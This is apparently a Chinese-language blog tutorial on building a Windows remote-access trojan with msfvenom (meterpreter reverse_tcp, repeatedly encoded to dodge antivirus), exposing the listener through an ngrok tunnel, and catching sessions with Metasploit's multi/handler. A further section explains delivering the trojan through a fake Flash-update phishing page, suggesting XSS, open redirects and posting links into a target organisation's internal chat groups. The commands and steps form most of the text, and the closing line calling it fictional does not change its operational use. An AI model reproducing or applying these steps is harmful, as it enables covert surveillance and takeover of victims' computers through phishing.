条件
- 一个外网服务器(这里用免费的ngrok)
- Metasploit(生成木马)
- Kali(映射端口)
工具下载
ngrok下载地址
https://www.ngrok.cc/#down-client
生成木马开始
1、在ngrok
官网上注册一个用户然后登陆,选择一个免费/付费隧道,然后选择tcp
协议
2、然后打开sunny
(在工具下载那里)
在kali
下输入
1 | ./sunny clientid 隧道id |
然后是这样的
打马赛克部分是我的外网的监听服务器
3、生成木马
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.241 LPORT=6 -f exe -i 12 > Fuck.exe |
-p
:选择攻击的payload
LHOST
:监听的本地IP
LPORT
:监听的本地端口-f
:表示为exe
程序-i
:重复编码12
次(听说有助于免杀)
然后就会生成一个Fuck.exe
的文件
4、使用msf
监听
1 | msf5 > use exploit/multi/handler |
2 | msf5 exploit(multi/handler) > set payloads windows/meterpreter/reverset_tcp |
3 | payloads => windows/meterpreter/reverset_tcp |
4 | msf5 exploit(multi/handler) > set lhost 192.168.31.241 |
5 | lhost => 192.168.31.241 |
6 | msf5 exploit(multi/handler) > set lport 6 |
7 | lport => 6 |
8 | msf5 exploit(multi/handler) > exploit |
然后在window
下打开Fuck.exe
后,Kali
会返回如下界面(meterpreter
)
这个时候已经可以监控打开这个exe
文件的电脑了。
Flash
钓鱼
钓鱼页面下载页:https://github.com/r00tSe7en/Fake-flash.cn
打开index.html
,修改如下为你木马的下载地址
然后打开页面点击就会跳转到https://www.xxxxxxxxxxxxxx.cn/
。
利用条件可以如下:
xss
打不到cookie
的时候,可以填写跳转到这里。- 收集信息到位,挖到一个
url
跳转,然后丢到他们内部群里。
以上条件纯属虚构,如违法立删… …